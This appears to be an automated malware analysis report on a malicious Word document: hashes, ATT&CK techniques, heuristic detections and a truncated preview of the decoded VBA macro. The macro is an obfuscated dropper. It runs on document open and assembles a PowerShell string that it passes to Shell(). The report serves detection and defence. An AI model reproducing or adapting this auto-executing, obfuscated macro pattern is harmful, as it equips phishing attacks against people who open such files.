Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 edc2ac668d69a215…

MALICIOUS

Office (OLE)

Size: 124.2 KB
Created: 2018-06-17 21:19:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 39a0b36ffd51fac29e8e05689ff59ac8
SHA-1: 78e76418458d2ca67d6e448d478c98b292fcffbb
SHA-256: edc2ac668d69a2158f2f1015d10b7b03fbf00dbc1c7eae3342cdec295709dd7b
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic

The file is a malicious Office document containing VBA macros. A 'Document_Open' macro is present, so the code runs automatically when the document is opened, and it reaches a 'Shell()' call, indicating an attempt to execute arbitrary code. The extracted macro assembles its command string piecewise at runtime (for example Chr$(...) + "OwerSH", i.e. "PowerSH...") and hands it to Shell() through Application.Run; the script therefore appears to construct and execute a PowerShell command, likely to download and run a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6591643-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6591643-0
  • VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This heuristic catches p-code-only macro documents and documents whose source extraction failed, where no visible source is available.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace rather than a payload location, so it should not be treated as an indicator on its own.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17635 bytes
SHA-256: b08cc975c55c985bb63d3fe57e6b7e8d8b868597362aec38aaa8eb5659b19c6a
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "JCWBzrKv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NGIkV()
On Error Resume Next
jHipt = Atn(GSWEE + Sin(HiPbn) - 29213 / 22801)
nputI = 82707 + 45191
ijvjdr = 58449 / 49206
oviJG = zojEjH * CSng(84700 * Fix(15192)) * qYGjW + CSng(YHrwT + CLng(UTwpWN)) / (zUiuQp * CSng(17066) - (89962 + Fix(lmuRj) - (73886 + CLng(VBHBS - Log(nnLmw) - 58616 + Int(kPNtt)))))
WZAYX = wqMNn
CmSmi = Atn(obqTri + Sin(IaktRj) - 79366 / 88769)
wQiGl = 82788 + 92566
HSHNld = 59854 / 18671
IbziN = CLuMCi * CSng(64062 * Fix(92918)) * iEdjf + CSng(kbBYV + CLng(PMcsAi)) / (NubSK * CSng(94966) - (650 + Fix(wzLEdC) - (31167 + CLng(CHHQn - Log(AwKsp) - 74731 + Int(SUBANj)))))
QSKBQ = UlFjYF
YGiKSh = Atn(AprIcK + Sin(HRQcl) - 15938 / 61546)
AHnqsj = 15968 + 67981
HLdGz = 51204 / 88356
tLXizi = wKwjP * CSng(51573 * Fix(29397)) * HKvYfa + CSng(VZQRA + CLng(ulvBUj)) / (wdlpq * CSng(39401) - (17280 + Fix(bZbas) - (95666 + CLng(hnjDGn - Log(zNhirC) - 48686 + Int(furqq)))))
iCGGJj = soGwz
Izvltl = Atn(LFisi + Sin(YVcBOi) - 97690 / 88518)
qWOrV = 87280 + 26372
BtIwz = 85398 / 64304
OEizAz = hLhTG * CSng(14121 * Fix(17590)) * VEuaQ + CSng(oiLiz + CLng(pOPdh)) / (ETzYIJ * CSng(64247) - (59254 + Fix(dYdqR) - (63686 + CLng(smbSz - Log(ZaWOA) - 66675 + Int(SvElaD)))))
rQOrI = rqZMsO
NGIkV = iOoSvjhbs + Chr$(dwOwEIALXGf + 80 + wXQPQTTJPu) + "OwerSH" + uOibLE + IzOzajUoCm + dEjCpVqQaro + IzbpPMBjS
vtcwz = Atn(zhwUQ + Sin(ssvZja) - 73461 / 5507)
oWSwJ = 94245 + 36690
hoPKb = 68611 / 47048
XrEvl = CcuoUi * CSng(72474 * Fix(83661)) * UrQalL + CSng(WFfDNX + CLng(zovORT)) / (JwWwp * CSng(26555) - (58633 + Fix(Yjiwv) - (95208 + CLng(sWhqh - Log(wPiji) - 73600 + Int(AYPTXC)))))
TOYsmL = ultWYR
rSjCz = Atn(KUfKXS + Sin(ouNLf) - 94634 / 19381)
NSCtB = 9043 + 99331
WizOS = 37774 / 67266
tlAzOF = mWbZh * CSng(54372 * Fix(11306)) * jGhwiv + CSng(PiuOaz + CLng(ihTAk)) / (nsnzt * CSng(65212) - (97658 + Fix(vzjqH) - (51049 + CLng(nUIUn - Log(VVEzi) - 28819 + Int(otFhrk)))))
tCzXW = UkFXqA
End Function
Function MlPQSMiH(mpWzEO)
On Error Resume Next
zQGpi = Atn(OtjjbC + Sin(liwWR) - 23743 / 12476)
qucMs = 82799 + 86873
jNQoh = 61548 / 81391
tBuamV = moidbS * CSng(72062 * Fix(16260)) * vAMac + CSng(HGJPj + CLng(UCacpV)) / (AEzkF * CSng(69969) - (97072 + Fix(tNZjE) - (72411 + CLng(RriSD - Log(unRWov) - 33522 + Int(DAlwlH)))))
nmTdm = bXcZz
OwtQit = Atn(PWSIO + Sin(wbHwJi) - 7096 / 41335)
uhqNtB = 99423 + 39170
BFjtvV = 21359 / 27024
OiZBB = CpBzI * CSng(45664 * Fix(62648)) * tIZdSH + CSng(usNaWz + CLng(DvfjV)) / (YIuck * CSng(3485) - (47371 + Fix(bcqINk) - (93649 + CLng(UXhMb - Log(mLaiS) - 60165 + Int(FRcBWX)))))
rMLqX = QdhCXo
rQQCf = OIijiVC + Shell(prhwow + mpWzEO + EIBQLCT, 2194 - 2194)
wcnwq = Atn(vfNvi + Sin(zcSVpA) - 34842 / 48392)
WDEni = 18753 + 56508
ZZlint = 2755 / 29895
nUPfvn = pwwEIL * CSng(32926 * Fix(4013)) * IEdif + CSng(Bwtsj + CLng(oHrBkN)) / (svLcq * CSng(68637) - (77525 + Fix(GSjwEB) - (79072 + CLng(ZjvNmT - Log(lCEBA) - 80995 + Int(DYzMJ)))))
zsrVi = twWVXl
End Function
Private Sub Document_open()
On Error Resume Next
iZjMKw = Atn(XhIXb + Sin(Mwbji) - 99923 / 45475)
GaWAN = 74189 + 65444
oLCcCH = 98696 / 74323
zukpXC = QDXtQ * CSng(10426 * Fix(93529)) * mitUbs + CSng(wBsASL + CLng(mjOhZ)) / (zHfKv * CSng(84884) - (62598 + Fix(wiVTK) - (76789 + CLng(WTSGpT - Log(jwWjpE) - 32169 + Int(iifvof)))))
PzEYks = dIzMZ
ZimZO = Atn(ZtWVD + Sin(sssam) - 54876 / 2493)
bRdAii = 14285 + 92679
XADtA = 89446 / 15309
oHPuO = kIrXku * CSng(87200 * Fix(46971)) * rcDEG + CSng(ALJwj + CLng(zBcRfq)) / (LwJpi * CSng(80314) - (86607 + Fix(Hoovi) - (86375 + CLng(ICiCp - Log(nwFwiv) - 71305 + Int(OGFDr)))))
sijrrf = aPFncN
Application.Run CRhLKt + "MlPQSMiH" + AQhStEDGodB, LNYzY + NGIkV + jmIPmTN
XEWoBV = Atn(UkoUT + Sin(Cjibb) - 35144 / 24107)
akscCs = 27387 + 76956
dIjdiq = 62875 / 61140
... (truncated)